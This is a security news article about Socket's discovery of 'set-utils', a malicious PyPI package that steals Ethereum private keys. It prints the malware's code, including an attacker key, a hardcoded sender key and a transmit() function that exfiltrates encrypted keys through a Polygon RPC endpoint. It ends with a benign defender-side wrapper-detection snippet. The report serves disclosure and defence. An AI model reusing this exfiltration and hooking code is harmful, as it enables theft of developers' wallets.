The Socket Research Team has discovered a sophisticated malicious PyPI package named ‘set-utils’ designed to steal Ethereum private keys from unsuspecting developers.
This package, which has been downloaded over 1,000 times since January 29, 2025, disguises itself as a simple utility for Python sets, mimicking legitimate and widely-used libraries such as python-utils (712M+ downloads) and utils (23.5M+ downloads).
The malware specifically targets blockchain developers using Python-based wallet management libraries, particularly those working with eth-account for Ethereum wallet creation and management.
By silently intercepting standard wallet creation methods, the malicious package creates a significant security risk for blockchain developers, DeFi projects, crypto exchanges, and individual users managing Ethereum wallets with Python automation.
What makes this attack particularly dangerous is its stealthy exfiltration method.
Instead of using traditional network communication channels that might trigger security alerts, the malware transmits stolen private keys via blockchain transactions through the Polygon RPC network.
This unusual approach helps attackers evade detection while compromising valuable cryptocurrency assets.
Technical investigation reveals the malware operates in multiple stages.
According to the Socket Research Team, the first stage embeds an attacker-controlled RSA public key, used to encrypt stolen credentials, and an attacker-controlled Ethereum wallet used to transmit them.
The package contains code similar to the following:
# attacker-controlled RSA public key (truncated in the report)
pycrypto_pubkey = b"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoE/n0a0nNk3hGlDv+y
# RSA-OAEP cipher: only the holder of the matching private key can decrypt what it produces
cipher = PKCS1_OAEP.new(RSA.import_key(pycrypto_pubkey))
# attacker-controlled sender account; its private key ships inside the package
sender_account = Account.from_key(
    "0xa3a1d8ee43adc1024b2407b2230e018bd1752ebc819b8abe873b8a3aa5acaee3"
)
Technical Mechanism of the Attack
The core exfiltration functionality is handled by a transmit() function that encrypts private keys with the attacker’s public key and sends them within Ethereum transactions via the Polygon RPC endpoint.
This function, shown below, represents the primary theft mechanism:
def transmit(acct):
    try:
        from web3 import Web3
        from hexbytes import HexBytes
        # Polygon Amoy RPC endpoint used as the exfiltration channel
        web3 = Web3(Web3.HTTPProvider("https://rpc-amoy.polygon.technology/"))
        transaction = {
            "value": 0,
            "nonce": web3.eth.get_transaction_count(sender_account.address),
            "gas": 60000,
            "gasPrice": web3.eth.gas_price,
            "chainId": web3.eth.chain_id,
            # the victim's private key, RSA-encrypted, is carried in the transaction data field
            "data": cipher.encrypt(acct.key),
        }
        # signed with the newly created account's own key object; sign_transaction_dict
        # is imported elsewhere in the package and is not shown in the report
        (
            v,
            r,
            s,
            encoded_transaction,
        ) = sign_transaction_dict(acct._key_obj, transaction, blobs=None)
        tx_hash = web3.eth.send_raw_transaction(HexBytes(encoded_transaction))
    except:
        # bare except: any failure (no network, unfunded account) is swallowed silently
        pass
The malware hooks the standard Ethereum account-creation functions with a wrapper that performs the exfiltration on a background thread to avoid detection.
The augment_func wrapper ensures that whenever a user creates an Ethereum account, their private key is silently stolen and transmitted to the attacker.
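As an added, defender-side example (not code from the article or from Socket), the following check looks for the trace an augment_func-style wrapper leaves on a wallet class: a public method whose own code object lives outside the library's package directory, or that carries the __wrapped__ attribute functools.wraps sets. The Account stand-in, the wrapper and the /fake/site-packages paths are all constructed for the demo; against a real install you would pass the real class and its package directory (for example os.path.dirname(eth_account.__file__)).

```python
import functools
import os
TRUSTED_DIR = "/fake/site-packages/eth_account"  # constructed path for the demo

def find_foreign_methods(cls, trusted_dir):
    """Map public callables on cls to their source file when the callable's own
    code lives outside trusted_dir or carries __wrapped__ (functools.wraps sets it)."""
    trusted_dir = os.path.abspath(trusted_dir)
    flagged = {}
    for name, attr in vars(cls).items():
        func = attr.__func__ if isinstance(attr, (staticmethod, classmethod)) else attr
        code = getattr(func, "__code__", None)
        if name.startswith("_") or code is None:
            continue
        path = os.path.abspath(code.co_filename)
        if not path.startswith(trusted_dir + os.sep) or hasattr(func, "__wrapped__"):
            flagged[name] = path
    return flagged

def _load(src, filename, **names):
    """Run src as if it were the module at filename, so co_filename is realistic."""
    ns = dict(names, functools=functools)
    exec(compile(src, filename, "exec"), ns)
    return ns

def build_demo():
    """Stand-in Account class, then the same class after a set-utils style
    augment_func wrapper is installed (both constructed for this demo)."""
    Account = _load(
        "class Account:\n"
        "    @staticmethod\n"
        "    def create():\n"
        "        return {'key': b'\\x01' * 32}\n",
        TRUSTED_DIR + "/account.py",
    )["Account"]
    before = find_foreign_methods(Account, TRUSTED_DIR)
    mal = _load(
        "def augment_func(fn):\n"
        "    @functools.wraps(fn)\n"  # copies __name__/__module__, hiding the hook
        "    def wrapper(*a, **kw):\n"
        "        acct = fn(*a, **kw); leaked.append(acct['key'])  # stands in for transmit()\n"
        "        return acct\n"
        "    return wrapper\n",
        "/fake/site-packages/set_utils/__init__.py",
        leaked=[],
    )
    Account.create = mal["augment_func"](Account.create)
    Account.create()  # a victim creates a wallet; the key is copied out
    return before, find_foreign_methods(Account, TRUSTED_DIR), mal["leaked"]
```

The clean class yields an empty result; after the hook is installed, `create` is reported with the wrapper's file path, even though functools.wraps made its name and module look legitimate.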
Following the report from the Socket Research Team (Dhanesh Dodia, Sambarathi Sai, and Dwijay Chintakunta), the PyPI team has removed the malicious package to prevent further attacks.
Developers are advised to audit their dependencies regularly, implement automated scanning tools, and consider using security solutions like Socket’s GitHub app to detect suspicious packages before they can cause harm.